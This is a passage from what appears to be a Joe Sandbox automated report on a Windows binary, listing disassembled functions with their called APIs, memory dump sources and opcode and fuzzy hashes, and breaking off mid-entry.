                                                                                                                                                                                      Function 0091F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • timeGetTime.WINMM ref: 0091F57A
                                                                                                                                                                                        • Part of subcall function 0090E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090E279
                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 009775D3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePeekSleepTimetime
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1792118007-0
                                                                                                                                                                                      • Opcode ID: 8904c12462b28baabe139aa6151f84c9015ade748ff381a698364e3e5b4d0235
                                                                                                                                                                                      • Instruction ID: 982811d4c713f03ffd1a3338727d54bcfadd2451040fb2f79501949cd2990c5c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8904c12462b28baabe139aa6151f84c9015ade748ff381a698364e3e5b4d0235
                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F05E712042159FD314EB69D445B96BBE9AF48320F00052AF81AC7392DB7068008B90
                                                                                                                                                                                      Function 009081C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 009083C4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 712828618-0
                                                                                                                                                                                      • Opcode ID: 243962e30963556cc636970411bfd90336c81835439d28383a1875599729c451
                                                                                                                                                                                      • Instruction ID: 8d150cc5191e1faa6d4557cff6646e980434ac98893a8497e48cd555f9905968
                                                                                                                                                                                      • Opcode Fuzzy Hash: 243962e30963556cc636970411bfd90336c81835439d28383a1875599729c451
                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F15971608202AFC704EF18C88196FBBE5FFD8344F54891DF999972A1EB30E945CB42
                                                                                                                                                                                      Function 00914040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 813c8efbda6e8e7075ac1d9009a51bc35bbd14b1bb7c82537021f5770fe9fc4f
                                                                                                                                                                                      • Instruction ID: d31b9d3bd73bbb62e6e7ec21997865aa8dc1f6118b7bc49ca5cfabb81bd712e2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 813c8efbda6e8e7075ac1d9009a51bc35bbd14b1bb7c82537021f5770fe9fc4f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F61B1B570420AAFCB00DF54C8C0ABAF7E9FF58310F148669E92987291D734ECA5CB91
                                                                                                                                                                                      Function 0091EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5f8c2541cd273184ed400af5c546ca692830ab76a00764a9dd9440ffdd4959e2
                                                                                                                                                                                      • Instruction ID: 96625658039b4761723f21464c522b1e71d3a374802a669efdcb6106262d64a0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f8c2541cd273184ed400af5c546ca692830ab76a00764a9dd9440ffdd4959e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: AD51B775700518AFCF04EF68C991FAD77A9AF88310B148059F90A9B3D2DB30ED45D750
                                                                                                                                                                                      Function 0090B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                                                      • Instruction ID: acceb73a835a983d36fdb0251c831b617544b3a6b97b1abc450d1196e1dd3e88
                                                                                                                                                                                      • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1418C79204602DFC724DF19D491A62F7E5FF89361714C42EE99A8BBA2D730E861CB50
                                                                                                                                                                                      Function 00904EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00904F8F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: 55deb7088a8fed095a30ce26a9a01ddf43433729f7ea67a7f875e16beb4976fb
                                                                                                                                                                                      • Instruction ID: d6ae006dc7eaf25456517a321c56cf98ba10ba6733b9fc431518582a16aaa9fc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 55deb7088a8fed095a30ce26a9a01ddf43433729f7ea67a7f875e16beb4976fb
                                                                                                                                                                                      • Instruction Fuzzy Hash: F7314FB1A10616AFCB08DF6CC484A6DB7B5BF88310F148629EA1997794D774BDA0CBD0
                                                                                                                                                                                      Function 0091F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: select
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1274211008-0
                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                      • Instruction ID: 32416d8638d0aee6d9413df96916e70b9f169ba891db08e4d4597f2474bcca6e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69310A71B0010EABC708EF58C4A0AA9F7A5FF89350B6486A5E449CB255D735EDC1CBC0
                                                                                                                                                                                      Function 0097AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                      • Opcode ID: 0f87f62d83311892c0d173aba10c254dbbb5dc9b9322d001161a352a6e7d2b34
                                                                                                                                                                                      • Instruction ID: 5c77a26fa87fd52b00ca376416d1366eb1731fc899ba1c27c7c222a47b97e124
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f87f62d83311892c0d173aba10c254dbbb5dc9b9322d001161a352a6e7d2b34
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93415E70608655DFDB24CF18C484B5ABBE1BF85304F19899CE9994B362C372EC85CF52
                                                                                                                                                                                      Function 00904D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 06815acc19a5da1ce5f0a33552bb9fff7c1b2f37f00a7f4874ae43e3ec79753b
                                                                                                                                                                                      • Instruction ID: 3f760fcbd3c63b58f17d9979c91400008345477c0b95668a44735a4bf517714f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 06815acc19a5da1ce5f0a33552bb9fff7c1b2f37f00a7f4874ae43e3ec79753b
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA210572604608EBCF185F11E98066D7FF8FF86350F21C96DE48AC5051EB30A5E0DB55
                                                                                                                                                                                      Function 0090D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                                                      • Instruction ID: 253cd6e15d7cffffbfdda4f7b6e4cc3034b2151c9c4805b3e3ba8343c2cf9863
                                                                                                                                                                                      • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 87115175605605DFC724DF68D481A16B7F9FF89310720C82EE88ECB661E732E841CB50
                                                                                                                                                                                      Function 00903F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00903F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00903F90
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009034E2,?,00000001), ref: 00903FCD
                                                                                                                                                                                        • Part of subcall function 00903E78: FreeLibrary.KERNEL32(00000000), ref: 00903EAB
                                                                                                                                                                                        • Part of subcall function 00904010: _memmove.LIBCMT ref: 0090405A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Library$Free$Load_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3640140200-0
                                                                                                                                                                                      • Opcode ID: 5295631d1dc619be4e35039ba3c4bd9dbedef85c2a97e7485f598a3e88203e3d
                                                                                                                                                                                      • Instruction ID: d89bbf1d50c66963afe26a13acb56912848cdf1050d8f8fbf068ab7fb21ac5d6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5295631d1dc619be4e35039ba3c4bd9dbedef85c2a97e7485f598a3e88203e3d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B11A372614215BFCB10AF64EC07F9D77A99F90700F108929F642E61C2DBB49E45AB50
                                                                                                                                                                                      Function 0097AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                      • Opcode ID: e675f0436039a61d06084dac4d09a5a792eed44e42e65f4e36958252c9bc32a8
                                                                                                                                                                                      • Instruction ID: cfcf4f89f4980b21a0e2c133e0c1a05cd34a7cbe079e72f59cf31c0703f33f4d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e675f0436039a61d06084dac4d09a5a792eed44e42e65f4e36958252c9bc32a8
                                                                                                                                                                                      • Instruction Fuzzy Hash: E5215770608615CFDB24CF28C444B5ABBE1BF89304F144968FA994B272C332E885CF52
                                                                                                                                                                                      Function 009080EA Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                                                                                                                                                                      • Instruction ID: fb11a2cf1401a28327a13f33fa41d427d777fa93875180a64e731924f1348b56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                                                                                                                                                                      • Instruction Fuzzy Hash: F201E97230D6159FC750AB58D881E6BB39CEF84760B14422AF8A9872D1DE219C2186D0
                                                                                                                                                                                      Function 009610E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                      • Opcode ID: acdf3f6c029eea7295dd0d4ae47ccc062322ca02435346d033d6a02138db24a9
                                                                                                                                                                                      • Instruction ID: 96c85889dd42e2ad702ed1e9ddc97c5d813f4abcaa0a9d0d7b885a209a52937b
                                                                                                                                                                                      • Opcode Fuzzy Hash: acdf3f6c029eea7295dd0d4ae47ccc062322ca02435346d033d6a02138db24a9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A4115E363052159FDB14DF19C890ADA77E9FF8A760B0A816AFD49CB351CB30AD808B91
                                                                                                                                                                                      Function 00904CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00904E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00904CF7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                      • Opcode ID: 0863b5d6c8d24558946f31ad8ba4dee93824eb3f5bd394728395f4664d634ff8
                                                                                                                                                                                      • Instruction ID: d75949a8a84fb2e2b653660b4cd86330309e968d3bf2061be874b71d41b3efcc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0863b5d6c8d24558946f31ad8ba4dee93824eb3f5bd394728395f4664d634ff8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 80113C712057559FE720CF16C880FA6B7E9EF44754F10C91DE6DA86A90C775F844CB60
                                                                                                                                                                                      Function 00904D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
